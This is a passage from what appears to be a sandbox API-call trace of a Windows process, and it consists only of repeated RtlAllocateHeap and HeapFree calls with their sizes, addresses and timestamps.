returned 0x328e770 [0058.180] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.180] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.180] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.180] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.180] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0058.180] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.180] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.181] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.181] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.181] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.181] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.181] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.181] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.181] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.181] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.181] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.181] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.181] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.181] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.181] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.181] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.181] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.181] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.181] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.181] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0058.181] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.181] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.181] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.181] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0058.181] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.181] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.181] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.181] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.181] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.181] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.181] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.181] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.181] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.181] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.181] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.181] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.181] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.181] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.182] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.182] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.182] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.182] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.182] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.182] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.182] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.182] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.182] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.182] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.182] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.182] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.182] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.182] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.182] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.182] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.182] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.182] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.182] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0058.182] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.182] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.182] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.182] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.182] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.182] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.182] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.182] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.182] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.182] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0058.182] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.182] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.182] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.182] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.182] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.182] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.183] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.183] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.183] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.183] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.183] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.183] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.183] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.183] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.183] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.183] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.183] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.183] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.183] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.183] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.183] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.183] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0058.183] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.183] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.183] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.183] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.183] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0058.183] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.183] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.183] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.183] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0058.183] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.183] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.183] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.183] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.183] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.183] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.183] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.183] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.183] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.183] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.183] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.184] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.184] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.184] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.184] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.184] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.184] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.184] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.184] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.184] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.184] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.184] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.184] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.184] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.184] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.184] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.184] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.184] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.184] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.184] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.184] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.184] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.184] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0058.184] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.184] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.184] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.184] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.184] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.184] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.184] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.184] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.184] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.184] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.184] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.184] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.184] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.184] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.185] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.185] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.185] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.185] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.185] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.185] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.185] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.185] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.185] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.185] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.185] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.185] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0058.185] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.185] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.185] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.185] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.185] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0058.185] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.185] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.185] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.185] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0058.185] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.185] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.185] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.185] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.185] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.185] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.185] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.185] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.185] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.185] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.185] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.185] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.185] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.185] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.186] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.186] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.186] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.186] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.186] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.186] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.186] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.186] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.186] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.186] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.186] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.186] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.186] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.186] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.186] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.186] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.186] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.186] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.186] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0058.186] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.186] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.186] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.186] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.186] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.186] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.186] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.186] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.186] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.186] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.186] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.186] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.186] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.186] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.186] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.186] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.186] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.187] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.187] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.187] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.187] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.187] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.187] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.187] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.187] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.187] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0058.187] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.187] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.187] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.187] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.187] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0058.187] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.187] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.187] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.187] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.187] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.187] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.187] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.187] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.187] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.187] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.187] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.187] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.187] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.187] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.187] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.187] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 